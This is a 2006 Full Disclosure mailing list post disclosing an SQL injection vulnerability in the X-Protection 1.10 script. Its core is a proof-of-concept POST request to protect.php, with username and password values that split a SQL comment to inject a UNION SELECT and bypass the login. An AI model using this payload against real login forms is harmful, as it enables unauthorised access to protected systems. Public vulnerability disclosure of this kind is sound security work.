Full Disclosure mailing list archives
X-Protection 1.10 SQL Injection Vulnerability
From: SirDarckCat <sirdarckcat () gmail com>
Date: Sat, 29 Jul 2006 23:47:04 -0500
Discovered by Sirdarckcat from elhacker.net X-Protection 1.10 http://members.lycos.co.uk/xscripts03/ ============================================== X-Protection is a simple script made for protectiong files with a simple file inclusion. There is a SQL injection vulnerability. ============================================== PoC: http://www.server.com/protect.php POST: username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/* ============================================== Att. Sirdarckcat elhacker.net -- Att. SirDarckCat () GMail com http://www.google.com/search?q=sirdarckcat
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- X-Protection 1.10 SQL Injection Vulnerability SirDarckCat (Jul 29)